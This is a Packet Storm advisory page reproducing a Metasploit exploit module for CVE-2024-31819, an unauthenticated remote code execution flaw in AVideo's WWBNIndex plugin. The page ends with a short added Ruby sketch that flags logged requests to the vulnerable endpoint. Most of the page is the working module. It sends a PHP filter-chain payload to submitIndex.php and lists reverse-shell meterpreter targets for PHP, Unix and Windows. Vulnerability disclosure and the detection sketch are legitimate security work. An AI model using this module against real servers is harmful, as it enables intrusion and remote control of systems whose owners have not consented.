
AVideo WWBNIndex Plugin Unauthenticated Remote Code Execution

22 May 2024 | Reported by Valentin Lobstein, metasploit.com | Type: packetstorm | Source: packetstormsecurity.com

An unauthenticated remote code execution vulnerability in submitIndex.php of the AVideo WWBNIndex plugin allows remote attackers to execute arbitrary PHP code on the server.

Code
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::PhpFilterChain
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution (RCE) vulnerability
          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the
          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`
          function without proper sanitization. By exploiting this, an attacker can leverage the
          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows
          for the execution of commands and control over the affected system. The exploit is
          particularly dangerous because it does not require authentication, making it possible
          for any remote attacker to exploit this vulnerability.
        },
        'Author' => [
          'Valentin Lobstein'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-31819'],
          ['URL', 'https://github.com/WWBN/AVideo'],
          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']
        ],
        'Platform' => ['php', 'unix', 'linux', 'win'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix In-Memory',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows In-Memory',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2024-04-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443,
          'FETCH_WRITABLE_DIR' => '/tmp'
        }
      )
    )
  end

  def exploit
    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
    filter_payload = generate_php_filter_payload(php_code)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'ctype' => 'application/x-www-form-urlencoded',
      'data' => "systemRootPath=#{filter_payload}"
    )
    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET',
      'follow_redirect' => true
    })
    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    # The version is read from the page footer or from an HTML comment.
    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)
    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

    version = Rex::Version.new(version_match[1])
    plugin_check = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),
      'method' => 'GET'
    })
    # Without the explicit return the Safe result was discarded and the
    # version check below ran even when the plugin was absent.
    unless plugin_check&.code == 200
      return CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')
    end

    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))
      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")
    end

    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")
  end
end
```
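The module lists `IOC_IN_LOGS` among its side effects. As an added example (not part of the module or of the AVideo project), the sketch below triages logged requests for the endpoint and parameter the module uses and applies the same version range as its `check` method. It assumes a WAF or reverse proxy that records request bodies; the record layout, the classification labels and the sample records are constructed for illustration.

```ruby
require 'uri'

# Endpoint and parameter are the ones the module above posts to.
ENDPOINT = %r{/plugin/WWBNIndex/submitIndex\.php\z}i
PARAM = 'systemRootPath'
# A filesystem root path never starts with a stream wrapper (php://, data:, ...).
WRAPPER = %r{\A\s*(?:[a-z][a-z0-9+.\-]*://|data:)}i
# Version range the module's check method treats as affected.
# Gem::Version stands in for Rex::Version here (assumption of this example).
AFFECTED = (Gem::Version.new('12.4')..Gem::Version.new('14.2')).freeze

def affected_version?(version)
  AFFECTED.cover?(Gem::Version.new(version))
end

# record: { method:, path:, body: } as captured by a WAF or reverse proxy
# that logs request bodies (assumed; plain access logs omit POST data).
def classify(record)
  path = record[:path].to_s.split('?', 2).first.to_s
  return :ignore unless ENDPOINT.match?(path)
  return :probe unless record[:method] == 'POST'

  value = URI.decode_www_form(record[:body].to_s).to_h[PARAM]
  return :probe if value.nil?
  return :exploit_attempt if WRAPPER.match?(value)

  :review # parameter set to a plain path: unusual, needs a human look
rescue ArgumentError
  :review # malformed body sent to this endpoint still deserves a look
end

# Constructed sample records, not taken from real traffic.
SAMPLES = [
  { method: 'GET',  path: '/plugin/WWBNIndex/submitIndex.php', body: '' },
  { method: 'POST', path: '/plugin/WWBNIndex/submitIndex.php',
    body: 'systemRootPath=php%3A%2F%2Ffilter%2FCHAIN-PLACEHOLDER' },
  { method: 'POST', path: '/plugin/WWBNIndex/submitIndex.php',
    body: 'systemRootPath=%2Fvar%2Fwww%2Fhtml%2FAVideo%2F' },
  { method: 'GET',  path: '/index.php', body: '' }
].freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |r| puts "#{r[:method]} #{r[:path]} -> #{classify(r)}" }
  puts "14.2 affected? #{affected_version?('14.2')}"
end
```

A `:probe` on its own matches the GET that the module's `check` sends to the plugin path, so it is worth correlating with any later `:exploit_attempt` from the same source.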
